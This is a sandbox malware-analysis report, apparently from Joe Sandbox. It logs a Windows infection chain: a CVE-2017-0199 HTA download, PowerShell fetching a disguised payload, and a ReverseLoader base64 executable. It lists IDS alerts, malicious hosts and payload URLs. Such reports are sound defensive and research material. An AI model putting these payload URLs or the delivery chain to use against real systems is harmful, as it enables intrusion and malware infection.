Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.3.22.13:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.22.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.3.22.13:80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.22.13:80 -> 192.168.2.22:49162
Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 192.3.22.13:80
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.22.13:80 -> 192.168.2.22:49164
Source: Network traffic	Suricata IDS: 2858796 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M1 : 192.168.2.22:49167 -> 192.3.22.13:80
Source: Network traffic	Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 192.3.22.13:80 -> 192.168.2.22:49167
Source: Network traffic	Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 192.3.22.13:80 -> 192.168.2.22:49167
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 192.3.22.13:80 -> 192.168.2.22:49167
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.22:49166

Yara detected Generic Downloader

Source: Yara match

File source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /352/WRFFRF.txt HTTP/1.1Host: 192.3.22.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 142.215.209.78 142.215.209.78
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

DNS query: name: ip-api.com

Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 192.3.22.13:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.22.13:80

Source: global traffic	HTTP traffic detected: GET /wUE3Zl?&temple=standing&steps=overwrought&official=hushed&pressurisation HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wUE3Zl?&temple=standing&steps=overwrought&official=hushed&pressurisation HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /352/seethebestthingswithgreatsituationshandletotheprogress.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.22.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /352/seethebestthingswithgreatsituationshandletotheprogress.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.22.13If-Range: "2c931-62740beac27e0"
Source: global traffic	HTTP traffic detected: GET /xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.22.13Connection: Keep-Alive

Source: unknown

HTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49166 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_000007FE899C4B18 URLDownloadToFileW,

5_2_000007FE899C4B18

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BB16081A.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /wUE3Zl?&temple=standing&steps=overwrought&official=hushed&pressurisation HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wUE3Zl?&temple=standing&steps=overwrought&official=hushed&pressurisation HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /352/seethebestthingswithgreatsituationshandletotheprogress.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.22.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /352/seethebestthingswithgreatsituationshandletotheprogress.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.22.13If-Range: "2c931-62740beac27e0"
Source: global traffic	HTTP traffic detected: GET /xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.22.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /352/WRFFRF.txt HTTP/1.1Host: 192.3.22.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: provit.uk
Source: global traffic	DNS traffic detected: DNS query: 1017.filemail.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com

Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/
Source: mshta.exe, 00000004.00000002.481189241.0000000000558000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003E95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta...p
Source: mshta.exe, 00000004.00000002.481189241.0000000000513000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.hta;
Source: mshta.exe, 00000004.00000003.479097372.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003E95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.htaAcC:
Source: mshta.exe, 00000004.00000003.478779442.0000000002E05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.htahttp://192.3.22.13/
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/352/seethebestthingswithgreatsituationshandletotheprogress.htarisationM
Source: powershell.exe, 00000005.00000002.501953877.0000000002481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/xampp/se/seet
Source: powershell.exe, 00000005.00000002.501953877.0000000002481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.501876958.0000000002167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF
Source: powershell.exe, 00000005.00000002.501876958.0000000002167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFC:
Source: powershell.exe, 00000005.00000002.501876958.00000000020E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFdll
Source: powershell.exe, 00000005.00000002.501953877.0000000002481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFp
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000005.00000002.501953877.000000000363E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: AddInProcess32.exe, 00000012.00000002.643424873.0000000002321000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000012.00000002.643424873.00000000023D8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000012.00000002.643424873.00000000023BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: AddInProcess32.exe, 00000012.00000002.643424873.0000000002321000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000012.00000002.643424873.00000000023BC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000012.00000002.641003530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000005.00000002.505604190.00000000122B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000005.00000002.501953877.0000000002281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.641719503.000000000232C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.546084174.0000000002421000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000012.00000002.643424873.0000000002321000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000012.00000002.643424873.00000000023BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000003.479097372.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.481355737.0000000003EA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 0000000E.00000002.546084174.0000000002622000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com
Source: powershell.exe, 0000000C.00000002.641719503.00000000027F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com/api/file/get?filek
Source: powershell.exe, 0000000E.00000002.545365008.00000000001D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2
Source: powershell.exe, 0000000E.00000002.546084174.0000000002622000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
Source: AddInProcess32.exe, 00000012.00000002.641003530.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 00000005.00000002.505604190.00000000122B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.505604190.00000000122B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.505604190.00000000122B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.505604190.00000000122B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
